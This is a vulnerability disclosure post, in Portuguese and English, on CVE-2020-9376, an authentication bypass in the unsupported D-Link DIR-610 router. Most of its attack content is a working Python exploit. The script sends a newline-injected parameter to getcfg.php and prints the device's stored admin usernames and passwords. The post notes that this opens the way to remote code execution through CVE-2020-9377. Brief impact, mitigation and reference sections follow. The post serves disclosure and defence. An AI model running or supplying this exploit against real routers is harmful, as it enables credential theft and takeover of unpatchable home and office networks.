Heitor Gouvêa
CVE-2020-9376 - Authentication bypass on D-LINK 610 Router
Summary
DIR-610 é um roteador que foi desenvolvido e vendido pela DLINK e foi distribuído na América Central e na América do Sul. Um atacante pode utilizar a CVE-2020-9376 & CVE-2020-9377 para burlar o mecanismo de autenticação desse aparelho e conseguir acesso ao painel de administração desse roteador, permitindo que o mesmo execute de forma arbitrária códigos diretamente no sistema operacional do mesmo.
Description
Exploit
#!/usr/bin/python
import xml.etree.ElementTree as ET
import urllib2
import sys
def main(host, port):
content = urllib2.urlopen('http://%s:%s/getcfg.php' % (host, port), 'SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1').read()
root = ET.fromstring(content)
for user in root.findall('./module/device/account/entry'):
name = user.findall('./name')[0].text
password = user.findall('./password')[0].text
print 'User: %s\\\\nPassword: %s\\\\n\\\\n' % (name, password)
if __name__ == '__main__':
[host, port] = sys.argv[1:3]
main(host, port)
Impact
An attacker can circumvent the authentication mechanisms of this device and gain access to the administration panel and also to restricted information, such as the users and passwords present on the device, later on, they can exploit the CVE-2020-9377 vulnerability of RCE.
Mitigation
While D-Link is aware of vulnerabilities involving DIR-610, these products have reached End of Life (EoL)/End of Support (EoS) and there is no extended support or development for them. D-Link will not be able to resolve device or firmware issues as all development and customer support has ceased.
The DIR-610 Rev. Ax reached its End of Support Date in 2014, it is no longer supported and firmware development has stopped, all consumers still using the product should retire it and immediately replace the device.
Conclusion
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
- https://www.dlink.com.br/produto/dir-610/
- https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A2-Broken_Authentication
- https://portswigger.net/web-security/authentication